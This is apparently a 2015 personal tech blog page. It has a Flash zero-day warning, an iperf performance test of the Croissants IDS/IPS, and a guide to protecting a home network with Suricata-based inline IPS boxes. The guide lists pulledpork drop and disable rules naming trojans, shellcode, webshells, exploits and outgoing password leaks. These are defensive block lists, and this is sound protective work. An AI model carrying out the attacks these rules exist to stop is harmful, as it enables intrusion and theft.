Recently, Hacking Team (a team of hackers which help governments to monitor and hack their citizens) has been hacked and some (at least 3 at the time of this writing) Flash player 0day expolits by Hacking Team were disclosed. Flash is now considered as vulnerable for all systems as it has no fix at the moment.

Firefox has been disabled the Flash from being played unless you enable it. How to watch Youtube videos? I suggest you to install "Youtube Flash-HTML5" add-on if you are using Firefox. You can enable Flash or HTML5 at anytime.

That's all! See you.

UPDATE

According to Google Project Zero, Flash v18.0.0.209 is also vulnerable.

Monday, July 13, 2015

HOWTO : Performance Test on Croissants

Croissants is an Intrusion Detection and Prevention System and it is running AF_PACKET as inline mode.

Hardware

Croissants :

Motherboard : ASRock Rack C2750D4I server board
CPU : Intel Atom C2750
RAM : 4 x 8GB (32GB) DDR3-1600

The performance of C2750 is similar to Xeon E3-1220L. Please refer to the comparison page at here.

Laptop(A) :

Model : Lenovo Thinkpad X200
RAM : 4 GB

Laptop(B) :

Model : Lenovo Thinkpad X201s
RAM : 8 GB

Software

Croissants

Croissants is installed with nsm_install_4core_16ram (version 0.1.5 dated July 13, 2015).

sudo apt-get update
sudo apt-get install glances


Laptop(A) and Laptop(B)

sudo apt-get update
sudo apt-get install iperf


Connection

Laptop(A) --- Croissants --- Laptop(B)

Laptop(A) is set to 111.111.111.111 IP address and it is acting as server of iperf.

Laptop(B) is set to 111.111.111.112 IP address and it is acting as client of iperf.

Make sure Laptop(A) and Laptop(B) are pingable.

Performance Test

Croissants

glances

Laptop(A)

sudo iperf -s -p 80

Laptop(B)

sudo iperf -c 111.111.111.111 -p 80 -P 50

Result

Crossiants - about 920 Mbps
Laptop(B) - about 820 Mbps

That's all! See you.

Thursday, July 02, 2015

HOWTO : Protect My Home Network With Croissants 2



What is Croissants?

Croissants is an Intrusion Detection and Prevention System and running with Suricata. The components also including Snorby (Event Manager & Web Interface), Pigsty (Event Spooler) and Pulledpork (Rules Manager).

Suricata is a high performance Network IDS, IPS and Network Security Monitoring Engine. Croissants running on AF_PACKET with Suricata and it throughtput is up to 10Gbps traffic. AF_PACKET is one of Linux kernal modules since version 3.6 and it is designed for packet capturing. It is almost plug and play.

AF_PACKET can be running on a very low power consumption x86 computer, such as Intel Avoton C2750 Octa-Core CPU with 8GB RAM or more. This CPU is only running at 20W. I recommend to use at least 8GB RAM for home security purpose. More memory and faster as well as more cores Intel CPU for Home Office or larger business is suggested.

What Is My Home Network Looks Like?

I have 10Mbps internet connection. I do not run with any modem. I have a home router (TP-LINK TL-WR1043 v1.x with stock firmware). I have two home switches (TP-LINK TL-SG1008D, it is like a hub more than a switch in general).

I have a Linux web server, a Windows 7 desktop, several Linux boxes and some Mac machines as well as a Time Capsule. I connect these boxes to the home switches. I disabled the wireless function on my home router and use Time Capsule as wireless router and Time Machine for Mac machines.

I implement two IPS on my home network. The IPS is connected between ISP and the home router. The other IPS is connected between home router and home switches. Therefore, I can monitor the traffic outside and inside my home network. I do not trust internet and intranet at all.








What Is The Hardware?

I use Asrock Rack C2750D4I motherboard with one more Intel Gigabit Desktop LAN card as my IPS.

Since Asrock Rack C2750D4I motherboard comes with 2 network interfaces, I need one more Intel Gigabit Desktop network interface on each box for monitoring purpose.

I installed 32GB RAM and 320GB Hard Drive on each box as IPS.

Internet -- IPS -- router -- IPS -- switch -- PCs and Time Capsule (including web server)

How About The Installation?

I select Ubuntu 14.04.2 LTS Server as the OS of the IDS/IPS. Since the network interfaces of Asrock Rack C2750D4I are Intel i210, the name of the interfaces on Ubuntu 14.04 is p119p1 and p121p1. While the Intel Gigabit Desktop network interface is eth0.

Install Ubuntu Server on the Asrock Rack C2750D4I as usual. Make sure you only connect the network cable to one of the network interfaces. I recommend you to install the OpenSSH when asks. Update and/or upgrade the Ubuntu Server when necessary.

Download the Croissants from here. The current version at the time of this writing is version 0.1.2 dated July 01, 2015.

Please follow the instructions on the official site to install. Configure the nsm.conf. Make sure to remember the password of MySQL as it will be asked when install. The username and password of control panel (Snorby) will also be configured. At the end of the installation, you will be asked for the time zone. Please select UTC. By the way, you may notice that there will have some error warning on the screen when installing. You just ignore it.

After the installation is completed, you can plug in the other network cables. Then, reboot the box. One more important thing is that you should configure your router to either DHCP or static IP addresses. If you selected DHCP, make sure it is reserved for the monitor interfaces (that is the Intel Gigabit Desktop network interfaces). The p119p1 and p121p1 do not have any IP address.

If everything correct, you can access to the monitor interfaces by using your browser, such as http://192.168.20.180. Enter your pre-set username and password when login. At the top right corner, select "Settings" to configure your time zone. Make sure you enter your password at "Current password (we need your current password to confirm your changes)" and then update the settings.

At this moment, your two boxes are in IDS mode. How to enable it to IPS mode?

You may need to change the name of the Intel Gigabit Desktop network interfaces when they are changed unexpected. You can change the name back to eth0 with the following command :

sudo nano /etc/udev/rules.d/70-persistent-net.rules

How To Configure To IPS?

Log in to the two boxes via ssh or terminal. Then run the following command to configure the DROP rules.

sudo nano /etc/pulledpork/dropsid.conf

I suggest to append the following lines at the end of the files. They will block most unwanted traffic.

# HTTP request header invalid
1:2221013
# HTTP missing host header
1:2221014
# masscan port scanner
1:2017615,1:2017616
# DOS possible ssdp amplification scan
1:2019102
# DoS attacks -- UDP & ICMP Invalid checksum & packet too small
1:2200075,1:2200038,1:2200076,1:2200024
# IP & TCP Invalid checksum
1:2200073,1:2200074
# TCP packet too small
1:2200033
# stream established retransmission packet before last ack
#1:2210021
# stream established packet out of window
#1:2210020
# GPL attack response id check returned root
1:2100498
# COMPROMISED & DROP & CINS Active Threats
pcre:ET\sCOMPROMISED
pcre:ET\sDROP
pcre:ET\sCINS
# MALWARE, TROJAN, WORM, MOBILE_MALWARE, Amplification DoS, DDoS
pcre:ET\sMALWARE
pcre:ET\sTROJAN
pcre:WORM
pcre:ET\sMOBILE_MALWARE
pcre:ET\sSCAN
#pcre:ET\sSHELLCODE
pcre:Amplification
pcre:ET\sDOS
pcre:ET\sEXPLOIT
pcre:ET\sUSER_AGENTS
pcre:ET\sWEB_SERVER
pcre:GPL\sSNMP
#pcre:SURICATA\sSTREAM
pcre:ET\sCURRENT_EVENTS
pcre:ET\sWEB_SPECIFIC_APPS
# Outgoing basic auth base64 http password
1:2006380
# Quantum Insert Attack (by NSA)
# (SURICATA STREAM reassembly overlap with different data - 2210050)
# (LOCAL QI 302 and possible inject - 12345)
# https://github.com/fox-it/quantuminsert/tree/master/detection/suricata
1:2210050,1:12345
# GPL WEB_SERVER 403 Forbidden
1:2101201
# ET POLICY Suspicious inbound to MSSQL port 1433
1:2010935
# ET POLICY Suspicious inbound to mySQL port 3306
1:2010937
# SURICATA HTTP Host header ambiguous
1:2221015
# ET INFO Session Traversal Utilities for NAT (STUN Binding Request)
1:2016149


*** Please remember that you may enable some already disabled rules by the captioned setting. If you encounter any false positive alert, you can disable such rule(s) by the following.

sudo nano /etc/pulledpork/disablesid.conf

Append the following at the end of the file, for example.

# TROJAN 1.1.1.1
1:2017000
# DELETED
pcre:ET\sDELETED
# MOBILE_MALWARE Google Android Device HTTP Request
1:2012251
# MALWARE WhenUClick.com Weather App Checkin (2)
1:2000915
# SURICATA STREAM alerts
#pcre:SURICATA\sSTREAM
# SURICATA STREAM
#1:2210000-1:2210049
#1:2210051-1:2210057
# SURICATA STREAM alert when downloading
1:2210021
1:2210020
1:2210029
1:2210045
1:2200074
1:2210038
1:2210044
# ET CURRENT_EVENTS Possible Dynamic DNS Exploit Pack
1:2014445
# ET WEB_SERVER WebShell
1:2016683
1:2016992
# ET TROJAN Possible Downadup/Conficker-C P2P encrypted traffic UDP Ping Packet (bit value 5)
1:2009207
1:2009205
1:2009208
# ET TROJAN UPX compressed file download possible malware
1:2001046
# ET TROJAN VMProtect Packed Binary Inbound via HTTP
1:2009080
# ET WEB_SERVER Fake Googlebot UA 1 Inbound
#1:2015526



After that, you can reload the rules by the following command.

sudo nsm_cronjob_rules_update

or

sudo nsm_rules_update

How To Delete All Testing Traffic?

It is very easy to delete all testing traffic if you want to. However, it only delete all the traffic in the Snorby and leave all other setting untouched.

sudo nsm_snorby_db_reinstall

In addtion, I also suggest you to install anti-virus program on your Windows boxes for play safe. Meanwhile, you can classified the traffic on Snorby too.

The last thing should inform you that you are recommend to set the QoS at your router. Otherwise, the bandwidth will be consumed by one of the connections.

How About Performance Tuning?

You can follow this guide to tune the IDS/IPS to make it running more smoothly.

To have a more secured IDS/IPS, you can append the following line to the "/etc/fstab".

tmpfs /tmp tmpfs mode=1777,nosuid,nodev,noexec 0 0

Then run the following commands before reboot. If you encountered any error, please do not reboot your boxes or you cannot boot them up.

sudo mount -a
sudo mount -o remount /


Hope you enjoy your secured home network.

That's all! See you.